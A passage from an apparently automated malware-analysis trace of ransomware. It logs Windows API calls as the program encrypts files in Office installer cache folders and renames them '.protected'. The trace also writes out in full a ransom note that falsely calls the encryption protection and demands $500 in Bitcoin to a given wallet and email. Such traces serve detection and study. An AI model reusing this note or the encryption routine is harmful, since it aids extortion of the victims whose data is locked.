Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 77 [0058.504] StrStrW (lpFirst="ProjLR.cab", lpSrch=".txt") returned 0x0 [0058.504] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 77 [0058.504] StrStrW (lpFirst="ProjLR.cab", lpSrch=".rar") returned 0x0 [0058.504] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 77 [0058.504] StrStrW (lpFirst="ProjLR.cab", lpSrch=".zip") returned 0x0 [0058.505] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.520] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.520] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.520] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.520] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.543] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.543] CloseHandle (hObject=0xb4) returned 1 [0058.543] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.protected") returned 87 [0058.543] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.protected")) returned 1 [0058.544] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.544] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0058.544] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0058.544] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0058.544] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0058.544] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0058.544] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0058.544] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0058.544] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0058.544] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.544] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.545] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.551] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0058.551] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0058.551] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0058.551] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0058.552] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0058.552] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0058.552] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x750, lpOverlapped=0x0) returned 1 [0058.553] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff8b0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.553] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x750, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x750, lpOverlapped=0x0) returned 1 [0058.553] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.553] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.553] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.553] CloseHandle (hObject=0xb4) returned 1 [0058.553] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0058.553] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0058.554] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0058.554] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0058.554] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0058.554] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0058.554] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0058.554] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0058.555] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0058.555] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0058.555] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0058.555] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0058.555] CloseHandle (hObject=0xa4) returned 1 [0058.555] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0058.555] lstrcmpiW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0058.555] lstrcmpiW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0058.555] lstrcmpiW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0058.555] lstrcmpiW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0058.555] lstrcmpiW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0058.555] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C") returned 66 [0058.555] lstrcmpW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0058.555] lstrcmpW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0058.555] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*") returned 68 [0058.555] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0058.786] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0058.786] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0058.786] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0058.786] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0058.786] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0058.786] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\.") returned 68 [0058.786] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.786] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0058.786] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0058.786] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.786] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.786] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.786] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.786] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0058.786] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0058.786] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0058.786] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0058.786] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0058.786] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\..") returned 69 [0058.786] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0058.786] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.786] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0058.786] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0058.787] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.787] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.787] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.787] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.787] lstrcmpiW (lpString1="GrooveLR.cab", lpString2="Windows") returned -1 [0058.787] lstrcmpiW (lpString1="GrooveLR.cab", lpString2="Program Files") returned -1 [0058.787] lstrcmpiW (lpString1="GrooveLR.cab", lpString2="Program Files (x86)") returned -1 [0058.787] lstrcmpiW (lpString1="GrooveLR.cab", lpString2="$Recycle.bin") returned 1 [0058.787] lstrcmpiW (lpString1="GrooveLR.cab", lpString2="System Volume Information") returned -1 [0058.787] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 79 [0058.787] StrStrIW (lpFirst="GrooveLR.cab", lpSrch=".protected") returned 0x0 [0058.787] lstrcmpW (lpString1="GrooveLR.cab", lpString2="RESTORE_FILES.txt") returned -1 [0058.787] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.787] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.787] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.788] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 79 [0058.788] StrStrW (lpFirst="GrooveLR.cab", lpSrch=".txt") returned 0x0 [0058.788] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 79 [0058.788] StrStrW (lpFirst="GrooveLR.cab", lpSrch=".rar") returned 0x0 [0058.788] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 79 [0058.788] StrStrW (lpFirst="GrooveLR.cab", lpSrch=".zip") returned 0x0 [0058.788] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.789] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.789] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.789] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.789] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.808] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.808] CloseHandle (hObject=0xb4) returned 1 [0058.812] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.protected") returned 89 [0058.812] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.protected")) returned 1 [0058.813] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.813] lstrcmpiW (lpString1="GrooveMUI.msi", lpString2="Windows") returned -1 [0058.813] lstrcmpiW (lpString1="GrooveMUI.msi", lpString2="Program Files") returned -1 [0058.813] lstrcmpiW (lpString1="GrooveMUI.msi", lpString2="Program Files (x86)") returned -1 [0058.813] lstrcmpiW (lpString1="GrooveMUI.msi", lpString2="$Recycle.bin") returned 1 [0058.813] lstrcmpiW (lpString1="GrooveMUI.msi", lpString2="System Volume Information") returned -1 [0058.813] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 80 [0058.813] StrStrIW (lpFirst="GrooveMUI.msi", lpSrch=".protected") returned 0x0 [0058.813] lstrcmpW (lpString1="GrooveMUI.msi", lpString2="RESTORE_FILES.txt") returned -1 [0058.813] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.813] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.813] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.813] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 80 [0058.814] StrStrW (lpFirst="GrooveMUI.msi", lpSrch=".txt") returned 0x0 [0058.814] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 80 [0058.814] StrStrW (lpFirst="GrooveMUI.msi", lpSrch=".rar") returned 0x0 [0058.814] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 80 [0058.814] StrStrW (lpFirst="GrooveMUI.msi", lpSrch=".zip") returned 0x0 [0058.814] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.824] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.825] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.825] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.826] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.835] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.835] CloseHandle (hObject=0xb4) returned 1 [0058.835] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.protected") returned 90 [0058.835] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.protected")) returned 1 [0058.835] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.835] lstrcmpiW (lpString1="GrooveMUI.xml", lpString2="Windows") returned -1 [0058.835] lstrcmpiW (lpString1="GrooveMUI.xml", lpString2="Program Files") returned -1 [0058.835] lstrcmpiW (lpString1="GrooveMUI.xml", lpString2="Program Files (x86)") returned -1 [0058.835] lstrcmpiW (lpString1="GrooveMUI.xml", lpString2="$Recycle.bin") returned 1 [0058.836] lstrcmpiW (lpString1="GrooveMUI.xml", lpString2="System Volume Information") returned -1 [0058.836] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 80 [0058.836] StrStrIW (lpFirst="GrooveMUI.xml", lpSrch=".protected") returned 0x0 [0058.836] lstrcmpW (lpString1="GrooveMUI.xml", lpString2="RESTORE_FILES.txt") returned -1 [0058.836] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.836] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.836] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 